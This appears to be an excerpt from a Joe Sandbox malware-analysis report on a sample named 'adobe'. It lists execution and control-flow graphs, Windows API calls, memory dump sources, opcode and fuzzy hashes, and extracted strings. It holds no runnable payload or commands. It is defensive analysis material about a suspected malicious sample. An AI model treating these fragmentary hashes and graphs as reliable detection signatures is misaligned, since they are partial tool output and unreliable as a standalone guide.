                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 70c3ff21bd016c740cb21f7127a8404ea40059e112358b572e21da04c127a5a5
                                                        • Instruction ID: c3670ee71b40d3319535b912f39c4aa7d1a31ffd7f753121c470fa25795ba0b2
                                                        • Opcode Fuzzy Hash: 70c3ff21bd016c740cb21f7127a8404ea40059e112358b572e21da04c127a5a5
                                                        • Instruction Fuzzy Hash: 26B13970A102198FDB58EF79D5946AEB7B2FF84304F248479D416AB394DB75DC82CB80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 9a19fcf379bf1eacdaca1420708b89c816217bf0d8f14a4c9e5a04d352978df7
                                                        • Instruction ID: 5c3e0ac175c64fdc48b7d34f5a45a5ffd3abe4e494ef40e526dcd5fa032a4f41
                                                        • Opcode Fuzzy Hash: 9a19fcf379bf1eacdaca1420708b89c816217bf0d8f14a4c9e5a04d352978df7
                                                        • Instruction Fuzzy Hash: 4B51A1B4A102099FDFE5DB68D9806AEB7B2FB44301F2455A9E826EB244DB31DC41CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LReq$LReq$$eq$$eq
                                                        • API String ID: 0-731573373
                                                        • Opcode ID: 363acc651dfdc5c57f9e0a562c4a7d0039dcb993856ee9e09e4cd4fff264a71c
                                                        • Instruction ID: c9e295e9c5058290592c201692e41ecf2006c8c062a8360d96b5e01eceac1183
                                                        • Opcode Fuzzy Hash: 363acc651dfdc5c57f9e0a562c4a7d0039dcb993856ee9e09e4cd4fff264a71c
                                                        • Instruction Fuzzy Hash: 9951A570B002068FDB58DF39D954A6A77E2FF88304F1486A9E526DB399DB31EC41CB91

                                                        Execution Graph

                                                        Execution Coverage:8.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:7
                                                        execution_graph 14661 100d340 14662 100d386 GetCurrentProcess 14661->14662 14664 100d3d8 GetCurrentThread 14662->14664 14667 100d3d1 14662->14667 14665 100d415 GetCurrentProcess 14664->14665 14666 100d40e 14664->14666 14668 100d44b 14665->14668 14666->14665 14667->14664 14669 100d473 GetCurrentThreadId 14668->14669 14670 100d4a4 14669->14670 14671 100d588 DuplicateHandle 14672 100d61e 14671->14672 14673 1004668 14674 100467a 14673->14674 14675 1004686 14674->14675 14679 1004779 14674->14679 14684 1003e10 14675->14684 14680 100479d 14679->14680 14688 1004878 14680->14688 14692 1004888 14680->14692 14685 1003e1b 14684->14685 14700 1005d50 14685->14700 14687 1007036 14690 1004888 14688->14690 14689 100498c 14689->14689 14690->14689 14696 1004248 14690->14696 14694 10048af 14692->14694 14693 100498c 14693->14693 14694->14693 14695 1004248 CreateActCtxA 14694->14695 14695->14693 14697 1005918 CreateActCtxA 14696->14697 14699 10059db 14697->14699 14701 1005d5b 14700->14701 14704 1005d70 14701->14704 14703 1007195 14703->14687 14705 1005d7b 14704->14705 14708 1005da0 14705->14708 14707 100727a 14707->14703 14709 1005dab 14708->14709 14712 1005dd0 14709->14712 14711 100736d 14711->14707 14713 1005ddb 14712->14713 14715 10088cb 14713->14715 14718 100af81 14713->14718 14714 1008909 14714->14711 14715->14714 14722 100d068 14715->14722 14728 100afa7 14718->14728 14732 100afb8 14718->14732 14719 100af96 14719->14715 14723 100cfeb 14722->14723 14724 100d072 14722->14724 14723->14714 14725 100d0bd 14724->14725 14740 100d218 14724->14740 14744 100d228 14724->14744 14725->14714 14729 100afb8 14728->14729 14735 100b0b0 14729->14735 14730 100afc7 14730->14719 14734 100b0b0 GetModuleHandleW 14732->14734 14733 100afc7 14733->14719 14734->14733 14736 100b0e4 14735->14736 14737 100b0c1 14735->14737 14736->14730 14737->14736 14738 100b2e8 GetModuleHandleW 14737->14738 14739 100b315 14738->14739 14739->14730 14741 100d228 14740->14741 14743 100d26f 14741->14743 14748 100cd90 14741->14748 14743->14725 14746 100d235 14744->14746 14745 100d26f 14745->14725 14746->14745 14747 100cd90 GetModuleHandleW 14746->14747 14747->14745 14749 100cd95 14748->14749 14751 100db80 14749->14751 14752 100cebc 14749->14752 14751->14751 14753 100cec7 14752->14753 14754 1005dd0 GetModuleHandleW 14753->14754 14755 100dbef 14754->14755 14755->14751

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 100d330-100d3cf GetCurrentProcess 299 100d3d1-100d3d7 294->299 300 100d3d8-100d40c GetCurrentThread 294->300 299->300 301 100d415-100d449 GetCurrentProcess 300->301 302 100d40e-100d414 300->302 304 100d452-100d46d call 100d511 301->304 305 100d44b-100d451 301->305 302->301 307 100d473-100d4a2 GetCurrentThreadId 304->307 305->304 309 100d4a4-100d4aa 307->309 310 100d4ab-100d50d 307->310 309->310
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0100D3BE
                                                        • GetCurrentThread.KERNEL32 ref: 0100D3FB
                                                        • GetCurrentProcess.KERNEL32 ref: 0100D438
                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D491
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 2e42cf62acbb3ce9b6554c82b6341496f67bef307c59d1216d6bc6faeee19d72
                                                        • Instruction ID: f6ad7150e366a359a3f83449df09120fd0ce4c92d227187e111c7d6eab87ceef
                                                        • Opcode Fuzzy Hash: 2e42cf62acbb3ce9b6554c82b6341496f67bef307c59d1216d6bc6faeee19d72
                                                        • Instruction Fuzzy Hash: 495175B0900649CFEB54CFAAD448B9EBFF1EF48314F24C45AE049A72A1DB35A944CB61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 317 100d340-100d3cf GetCurrentProcess 321 100d3d1-100d3d7 317->321 322 100d3d8-100d40c GetCurrentThread 317->322 321->322 323 100d415-100d449 GetCurrentProcess 322->323 324 100d40e-100d414 322->324 326 100d452-100d46d call 100d511 323->326 327 100d44b-100d451 323->327 324->323 329 100d473-100d4a2 GetCurrentThreadId 326->329 327->326 331 100d4a4-100d4aa 329->331 332 100d4ab-100d50d 329->332 331->332
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0100D3BE
                                                        • GetCurrentThread.KERNEL32 ref: 0100D3FB
                                                        • GetCurrentProcess.KERNEL32 ref: 0100D438
                                                        • GetCurrentThreadId.KERNEL32 ref: 0100D491
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: f0c96db762e2e71d717c84175c12edf6ae27331a099a6f1c42a69948ca1cdb9d
                                                        • Instruction ID: d17e28f8374364646f2d052dc290ec0a657fb0649a90b3b967c9dd9719472c82
                                                        • Opcode Fuzzy Hash: f0c96db762e2e71d717c84175c12edf6ae27331a099a6f1c42a69948ca1cdb9d
                                                        • Instruction Fuzzy Hash: 0C5173B0900649CFEB54CFAAD448B9EBFF1EF88314F20C459E449A72A0DB35A940CB61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 361 100b0b0-100b0bf 362 100b0c1-100b0ce call 100aa74 361->362 363 100b0eb-100b0ef 361->363 369 100b0d0 362->369 370 100b0e4 362->370 365 100b0f1-100b0fb 363->365 366 100b103-100b144 363->366 365->366 372 100b151-100b15f 366->372 373 100b146-100b14e 366->373 417 100b0d6 call 100b348 369->417 418 100b0d6 call 100b339 369->418 370->363 374 100b161-100b166 372->374 375 100b183-100b185 372->375 373->372 377 100b171 374->377 378 100b168-100b16f call 100aa80 374->378 380 100b188-100b18f 375->380 376 100b0dc-100b0de 376->370 379 100b220-100b2e0 376->379 382 100b173-100b181 377->382 378->382 412 100b2e2-100b2e5 379->412 413 100b2e8-100b313 GetModuleHandleW 379->413 383 100b191-100b199 380->383 384 100b19c-100b1a3 380->384 382->380 383->384 387 100b1b0-100b1b9 call 100aa90 384->387 388 100b1a5-100b1ad 384->388 392 100b1c6-100b1cb 387->392 393 100b1bb-100b1c3 387->393 388->387 394 100b1e9-100b1f6 392->394 395 100b1cd-100b1d4 392->395 393->392 402 100b1f8-100b216 394->402 403 100b219-100b21f 394->403 395->394 397 100b1d6-100b1e6 call 100aaa0 call 100aab0 395->397 397->394 402->403 412->413 414 100b315-100b31b 413->414 415 100b31c-100b330 413->415 414->415 417->376 418->376
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B306
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 4105f9d48f34228eeafe8a5711aea93ae8adfb6dbf33fce54fb6281e81c9b9a1
                                                        • Instruction ID: 86f6c65feb51e682e7808049203f3897d30fdf6cf22516dc1aac23b654abbd4d
                                                        • Opcode Fuzzy Hash: 4105f9d48f34228eeafe8a5711aea93ae8adfb6dbf33fce54fb6281e81c9b9a1
                                                        • Instruction Fuzzy Hash: 74715370A00B058FE765DF6AD44079ABBF5FF88300F00892DD49ADBA80DB75E845CB90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 419 100590d-10059d9 CreateActCtxA 421 10059e2-1005a3c 419->421 422 10059db-10059e1 419->422 429 1005a4b-1005a4f 421->429 430 1005a3e-1005a41 421->430 422->421 431 1005a60 429->431 432 1005a51-1005a5d 429->432 430->429 434 1005a61 431->434 432->431 434->434
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: a8d8c1f9100c8398d9fab687b6e2b142ef77cdbb2155539ffb2da25516dd38a8
                                                        • Instruction ID: e188b7f026cae9f3d15d95629dfae751c9ed445b75de3751f7dd8a4c8747d6db
                                                        • Opcode Fuzzy Hash: a8d8c1f9100c8398d9fab687b6e2b142ef77cdbb2155539ffb2da25516dd38a8
                                                        • Instruction Fuzzy Hash: 0741F2B0C0071DCEDB24CFA9C885A9EBBF5FF49304F24816AD449AB251DB756946CF50

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 435 1004248-10059d9 CreateActCtxA 438 10059e2-1005a3c 435->438 439 10059db-10059e1 435->439 446 1005a4b-1005a4f 438->446 447 1005a3e-1005a41 438->447 439->438 448 1005a60 446->448 449 1005a51-1005a5d 446->449 447->446 451 1005a61 448->451 449->448 451->451
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 010059C9
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: d2c10fcb40de318eb5a2da998017121dde6fe2e4e9fa782e16747e2101a36772
                                                        • Instruction ID: 60917ff7c122688472ad4d1ed759cbe1cc0ca8c2d647818037cecb89cb92140c
                                                        • Opcode Fuzzy Hash: d2c10fcb40de318eb5a2da998017121dde6fe2e4e9fa782e16747e2101a36772
                                                        • Instruction Fuzzy Hash: F341D0B0C0071DCEEB24CFAAC885A9DBBF6FF49304F64805AD449AB251DB756945CF90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 452 100d580-100d586 453 100d588-100d61c DuplicateHandle 452->453 454 100d625-100d642 453->454 455 100d61e-100d624 453->455 455->454
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D60F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: cf96a6653eca2d1d233348f696fd4d75a67e1d8227f43434c9edcf9a332d3499
                                                        • Instruction ID: d325b8a5a6ec250d3e9aefdda0125509f10dfe03146f15e0f2796822df3099d7
                                                        • Opcode Fuzzy Hash: cf96a6653eca2d1d233348f696fd4d75a67e1d8227f43434c9edcf9a332d3499
                                                        • Instruction Fuzzy Hash: E321E5B5D00248DFDB10CF9AD884ADEBBF8EB48324F14845AE958A3350D375A950CF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 458 100d588-100d61c DuplicateHandle 459 100d625-100d642 458->459 460 100d61e-100d624 458->460 460->459
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D60F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: c9b6eb707a465fc9935b9d6421c734ec6a2306db53d2df563f9b0080aef3f9b7
                                                        • Instruction ID: 0a21fab6103d6e10d7f34cb82bb291a76711a46ea339f81830cf8a6c0a72d404
                                                        • Opcode Fuzzy Hash: c9b6eb707a465fc9935b9d6421c734ec6a2306db53d2df563f9b0080aef3f9b7
                                                        • Instruction Fuzzy Hash: 5021E4B5900248DFDB10CF9AD884ADEFFF8EB48320F14845AE918A3350D379A950CF65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 463 100b2a0-100b2e0 464 100b2e2-100b2e5 463->464 465 100b2e8-100b313 GetModuleHandleW 463->465 464->465 466 100b315-100b31b 465->466 467 100b31c-100b330 465->467 466->467
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0100B306
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1784056442.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1000000_adobe.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 15914a1d20603ae0bb731afb8bbb9d51aa1a90e5ade2db046ac9268dd37cf3e3
                                                        • Instruction ID: 0dd86e5e6d6605161426d368b16478744b62ecb3fe91c30cefb770959bf0bf74
                                                        • Opcode Fuzzy Hash: 15914a1d20603ae0bb731afb8bbb9d51aa1a90e5ade2db046ac9268dd37cf3e3
                                                        • Instruction Fuzzy Hash: F2110FB5C006498FDB20DF9AC444A9EFBF8EF88220F14845AD969A7240C379A545CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d8eb000420450d09ab7819fd65e8641f89620883d617f08c38bb9a1a8fa0235
                                                        • Instruction ID: 94836ec2e61f5492fad96f487a5e44b27a9e3456ac3f5d372fd929adafa79757
                                                        • Opcode Fuzzy Hash: 9d8eb000420450d09ab7819fd65e8641f89620883d617f08c38bb9a1a8fa0235
                                                        • Instruction Fuzzy Hash: 78212871508240DFDB05DF94DCC0B26BFA5FB98314F24C569ED091B2A6C336D856CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 56a71253b5b5fabcd89216353b7d27df880c13efa4eee79e6dc3fb7c7d3228d4
                                                        • Instruction ID: 389d1faf898f8a76e11acd494513d0cd672107dac97b8b036daab9a7b1ed3b6a
                                                        • Opcode Fuzzy Hash: 56a71253b5b5fabcd89216353b7d27df880c13efa4eee79e6dc3fb7c7d3228d4
                                                        • Instruction Fuzzy Hash: A42148B1508204DFDB00DF84CDC0B26BF65FB98324F24C569E9095B286C336E896C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783545696.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e1d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e16473fd43e26cefe245ae700965c967c16f29f14380d3a8a97f10855c5a32a3
                                                        • Instruction ID: 5d33a662f65d2abbc82695b52e4bf485d59ebeace975c84377927c5bdf1e57e2
                                                        • Opcode Fuzzy Hash: e16473fd43e26cefe245ae700965c967c16f29f14380d3a8a97f10855c5a32a3
                                                        • Instruction Fuzzy Hash: 1721F575508240DFDB14DF14D980B56BBA6FB8C314F24C56DD90A5B286C33AD887CA61
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783545696.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e1d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f4420e58efb60f59eb25001261a3b34cb17697df1d7e81d2c663cac4584c9e7
                                                        • Instruction ID: 673701c4b8271792c17f749ae7c498457bb31fb093f83c320dc7b557802c618a
                                                        • Opcode Fuzzy Hash: 5f4420e58efb60f59eb25001261a3b34cb17697df1d7e81d2c663cac4584c9e7
                                                        • Instruction Fuzzy Hash: 6121837550D3C08FD712CF24D990755BF71EB46314F28C5DAD8498B2A7C33A984ACB62
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                        • Instruction ID: 865ad6974262ea1031eea59a478f55a9f1ee9808d14fdb3e4a3f57135dc977f5
                                                        • Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                        • Instruction Fuzzy Hash: 5C21E476404240CFDB06CF40D9C4B16BF71FB84314F24C1A9DD480B266C33AD466CB91
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1783462838.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_e0d000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction ID: 7d276b74fb92f9bab72f245f36f80e66b4c1839917bf23e63c1053f0cb96d0ea
                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction Fuzzy Hash: B1112672404280CFDB12CF44D9C0B16BF71FB94324F24C2A9D9094B256C33AE85ACBA1

                                                        Execution Graph

                                                        Execution Coverage:12.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:27
                                                        Total number of Limit Nodes:6
                                                        execution_graph 24769 29c0848 24771 29c084e 24769->24771 24770 29c091b 24771->24770 24774 29c147f 24771->24774 24780 29c1350 24771->24780 24776 29c1366 24774->24776 24777 29c1483 24774->24777 24775 29c147a 24775->24771 24776->24775 24778 29c147f 2 API calls 24776->24778 24786 29c8221 24776->24786 24777->24771 24778->24776 24781 29c12fe 24780->24781 24782 29c135f 24780->24782 24781->24771 24783 29c147a 24782->24783 24784 29c8221 2 API calls 24782->24784 24785 29c147f 2 API calls 24782->24785 24783->24771 24784->24782 24785->24782 24788 29c822b 24786->24788 24787 29c82e1 24787->24776 24788->24787 24791 66ff9c1 24788->24791 24796 66ff9d0 24788->24796 24793 66ff9e5 24791->24793 24792 66ffbfa 24792->24787 24793->24792 24794 66ffe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 24793->24794 24795 66ffc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 24793->24795 24794->24793 24795->24793 24798 66ff9e5 24796->24798 24797 66ffbfa 24797->24787 24798->24797 24799 66ffe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 24798->24799 24800 66ffc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 24798->24800 24799->24798 24800->24798

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 127 66f34a8-66f34c9 129 66f34cb-66f34ce 127->129 130 66f34f4-66f34f7 129->130 131 66f34d0-66f34ef 129->131 132 66f34fd-66f351c 130->132 133 66f3c98-66f3c9a 130->133 131->130 141 66f351e-66f3521 132->141 142 66f3535-66f353f 132->142 134 66f3c9c 133->134 135 66f3ca1-66f3ca4 133->135 134->135 135->129 137 66f3caa-66f3cb3 135->137 141->142 143 66f3523-66f3533 141->143 146 66f3545-66f3554 142->146 143->146 255 66f3556 call 66f3cc8 146->255 256 66f3556 call 66f3cc0 146->256 147 66f355b-66f3560 148 66f356d-66f384a 147->148 149 66f3562-66f3568 147->149 170 66f3c8a-66f3c97 148->170 171 66f3850-66f38ff 148->171 149->137 180 66f3928 171->180 181 66f3901-66f3926 171->181 182 66f3931-66f3944 180->182 181->182 185 66f394a-66f396c 182->185 186 66f3c71-66f3c7d 182->186 185->186 189 66f3972-66f397c 185->189 186->171 187 66f3c83 186->187 187->170 189->186 190 66f3982-66f398d 189->190 190->186 191 66f3993-66f3a69 190->191 203 66f3a6b-66f3a6d 191->203 204 66f3a77-66f3aa7 191->204 203->204 208 66f3aa9-66f3aab 204->208 209 66f3ab5-66f3ac1 204->209 208->209 210 66f3ac3-66f3ac7 209->210 211 66f3b21-66f3b25 209->211 210->211 214 66f3ac9-66f3af3 210->214 212 66f3b2b-66f3b67 211->212 213 66f3c62-66f3c6b 211->213 225 66f3b69-66f3b6b 212->225 226 66f3b75-66f3b83 212->226 213->186 213->191 221 66f3af5-66f3af7 214->221 222 66f3b01-66f3b1e call 66f23a0 214->222 221->222 222->211 225->226 229 66f3b9a-66f3ba5 226->229 230 66f3b85-66f3b90 226->230 234 66f3bbd-66f3bce 229->234 235 66f3ba7-66f3bad 229->235 230->229 233 66f3b92 230->233 233->229 239 66f3be6-66f3bf2 234->239 240 66f3bd0-66f3bd6 234->240 236 66f3baf 235->236 237 66f3bb1-66f3bb3 235->237 236->234 237->234 244 66f3c0a-66f3c5b 239->244 245 66f3bf4-66f3bfa 239->245 241 66f3bda-66f3bdc 240->241 242 66f3bd8 240->242 241->239 242->239 244->213 246 66f3bfe-66f3c00 245->246 247 66f3bfc 245->247 246->244 247->244 255->147 256->147
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: 454e93ffe970fad0c8ba01fbbdf4adefbc57eee19428c544fce30df6093e59fc
                                                        • Instruction ID: 34a95d536e435d3c7fd6adb6361055cbd367289fa5a5305044956a0cfef8fa57
                                                        • Opcode Fuzzy Hash: 454e93ffe970fad0c8ba01fbbdf4adefbc57eee19428c544fce30df6093e59fc
                                                        • Instruction Fuzzy Hash: 5F322C34E1061ACBDB55EF75C99469DF7B2FFC9300F60865AD409AB364EB30A985CB80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 801 66f7dc8-66f7de6 802 66f7de8-66f7deb 801->802 803 66f7ded-66f7df7 802->803 804 66f7df8-66f7dfb 802->804 805 66f7e1e-66f7e21 804->805 806 66f7dfd-66f7e19 804->806 807 66f7e23-66f7e3d 805->807 808 66f7e42-66f7e45 805->808 806->805 807->808 809 66f7e5c-66f7e5e 808->809 810 66f7e47-66f7e55 808->810 812 66f7e65-66f7e68 809->812 813 66f7e60 809->813 816 66f7e6e-66f7e84 810->816 819 66f7e57 810->819 812->802 812->816 813->812 821 66f809f-66f80a9 816->821 822 66f7e8a-66f7e93 816->822 819->809 823 66f80aa-66f80b4 822->823 824 66f7e99-66f7eb6 822->824 827 66f810b 823->827 828 66f80b6-66f80df 823->828 833 66f808c-66f8099 824->833 834 66f7ebc-66f7ee4 824->834 831 66f810f-66f8111 827->831 832 66f810d 827->832 830 66f80e1-66f80e4 828->830 835 66f80ea-66f80f6 830->835 836 66f8197-66f819a 830->836 837 66f811b-66f8122 831->837 832->837 833->821 833->822 834->833 859 66f7eea-66f7ef3 834->859 846 66f8101-66f8103 835->846 838 66f83c6-66f83c9 836->838 839 66f81a0-66f81af 836->839 840 66f8124-66f8131 837->840 841 66f8133 837->841 844 66f83ec-66f83ee 838->844 845 66f83cb-66f83e7 838->845 853 66f81ce-66f8209 839->853 854 66f81b1-66f81cc 839->854 842 66f8138-66f813a 840->842 841->842 848 66f813c-66f813f 842->848 849 66f8151-66f818a 842->849 851 66f83f5-66f83f8 844->851 852 66f83f0 844->852 845->844 846->837 850 66f8105 846->850 855 66f83fe-66f8407 848->855 849->839 880 66f818c-66f8196 849->880 850->827 851->830 851->855 852->851 865 66f820f-66f8220 853->865 866 66f839a-66f83b0 853->866 854->853 859->823 862 66f7ef9-66f7f15 859->862 872 66f7f1b-66f7f45 862->872 873 66f807a-66f8086 862->873 874 66f8226-66f8243 865->874 875 66f8385-66f8394 865->875 866->838 886 66f7f4b-66f7f73 872->886 887 66f8070-66f8075 872->887 873->833 873->859 874->875 884 66f8249-66f833f call 66f65e8 874->884 875->865 875->866 936 66f834d 884->936 937 66f8341-66f834b 884->937 886->887 894 66f7f79-66f7fa7 886->894 887->873 894->887 899 66f7fad-66f7fb6 894->899 899->887 901 66f7fbc-66f7fee 899->901 908 66f7ff9-66f8015 901->908 909 66f7ff0-66f7ff4 901->909 908->873 912 66f8017-66f806e call 66f65e8 908->912 909->887 911 66f7ff6 909->911 911->908 912->873 938 66f8352-66f8354 936->938 937->938 938->875 939 66f8356-66f835b 938->939 940 66f835d-66f8367 939->940 941 66f8369 939->941 942 66f836e-66f8370 940->942 941->942 942->875 943 66f8372-66f837e 942->943 943->875
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
